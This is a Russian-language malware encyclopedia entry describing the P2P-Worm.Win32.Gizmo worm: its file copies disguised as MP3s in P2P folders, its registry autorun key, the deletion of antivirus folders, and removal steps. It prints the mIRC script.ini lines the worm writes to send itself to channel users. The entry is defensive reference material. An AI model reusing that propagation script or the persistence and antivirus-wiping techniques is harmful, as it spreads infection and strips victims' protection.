P2P-Worm.Win32.Gizmo
Материал из Total Malware Info
P2P-Worm.Win32.Gizmo Червь распространяющий себя через сети P2P. Является приложением Windows (PE-EXE файл). Имеет размер 32 768 байт. Упакован с помощью UPX, распакованный размер ~195 кбайт.
Инсталляция
Копирует свой исполняемый файл как:
%System%\Gizmo.Exe C:\PPWbLW.Exe D:\PPWbLW.Exe E:\PPWbLW.Exe F:\PPWbLW.Exe G:\PPWbLW.Exe H:\PPWbLW.Exe I:\PPWbLW.Exe J:\PPWbLW.Exe K:\PPWbLW.Exe L:\PPWbLW.Exe M:\PPWbLW.Exe N:\PPWbLW.Exe O:\PPWbLW.Exe P:\PPWbLW.Exe Q:\PPWbLW.Exe R:\PPWbLW.Exe S:\PPWbLW.Exe T:\PPWbLW.Exe U:\PPWbLW.Exe V:\PPWbLW.Exe W:\PPWbLW.Exe X:\PPWbLW.Exe Y:\PPWbLW.Exe Z:\PPWbLW.Exe
Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “AIMgBLw”=”%System%\Gizmo.Exe”
Деструктивная активность
Копирует свой исполняемый файл как:
С:\Program Files\Grokster\My Grokster\Casualties - Proud To Be Punk.mp3.exe C:\Program Files\ICQ\Shared Files\Elbow - NewBorn.Mp3.Exe C:\My Downloads\Therion - Cults Of The Shadow.Mp3.Exe C:\Program Files\EDonkey2000\Incoming\Vanessa Mae - Cotton Eye Joe.Mp3.Exe C:\Program Files\BearShare\Shared\Opeth - The Moor.Mp3.Exe C:\Program Files\Morpheus\My Shared Folder\Feeder - Just A Day.Mp3.Exe C:\Program Files\AIM95\AIMGizmo.Exe
Получает путь к установленной программе mIRC из параметра ключа реестра
[HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\mIrc] UninstallString
и использует этот путь для поиска файла script.ini, в который записывает следующие строки:
[script]
n0=on 1:JOIN:#:{
n1=/if ( $nick == $me ) { halt }
n2=/dcc send $nick %WinDir%\svchost.exe
n3=}
данный скрипт отсылает тело червя всем пользователям присоединяющимся к каналу. Удаляет все файлы в следующих папках:
C:\Progra~1\Norton~1 C:\Progra~1\Norton~2 C:\Progra~1\Symantec C:\Progra~1\Common~1\Symant~1 C:\Progra~1\Common~1\Symant~1\Script~1 C:\Progra~1\McAfee\VirusScan C:\Progra~1\McAfee\McAfee FireWall C:\Progra~1\PandaS~1\PandaA~1 C:\Progra~1\TrendM~1\Pc-cil~1 C:\Progra~1\Comman~1\F-PROT95 C:\Progra~1\ZoneLa~1\ZoneAlarm C:\Progra~1\TinyPe~1 C:\Progra~1\Kasper~1 C:\Progra~1\Trojan~1 C:\Progra~1\AvPersonal C:\Progra~1\Grisoft\AVG6 C:\Progra~1\AntiVi~1 C:\Progra~1\QuickH~1 C:\Progra~1\FWIN32 C:\Progra~1\FindVirus
Создает файл в своей рабочей папке:
WeHaveAWinner.Bat
И запускает его. При запуске данный файл запускает сам себя рекурсивно и отображает на экране сообщение с заголовком “Message From L0NEw0lf” и текстом “ MsgBox "Ignorance is not a virtue, AIMGizmo By L0NEw0lf”.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- При помощи ("Диспетчера задач") завершить процесс червя.
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить параметр в ключе реестра (как работать с реестром?):
- Удалить файлы:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “AIMgBLw”=”%System%\Gizmo.Exe”
%System%\Gizmo.Exe C:\PPWbLW.Exe D:\PPWbLW.Exe E:\PPWbLW.Exe F:\PPWbLW.Exe G:\PPWbLW.Exe H:\PPWbLW.Exe I:\PPWbLW.Exe J:\PPWbLW.Exe K:\PPWbLW.Exe L:\PPWbLW.Exe M:\PPWbLW.Exe N:\PPWbLW.Exe O:\PPWbLW.Exe P:\PPWbLW.Exe Q:\PPWbLW.Exe R:\PPWbLW.Exe S:\PPWbLW.Exe T:\PPWbLW.Exe U:\PPWbLW.Exe V:\PPWbLW.Exe W:\PPWbLW.Exe X:\PPWbLW.Exe Y:\PPWbLW.Exe Z:\PPWbLW.Exe
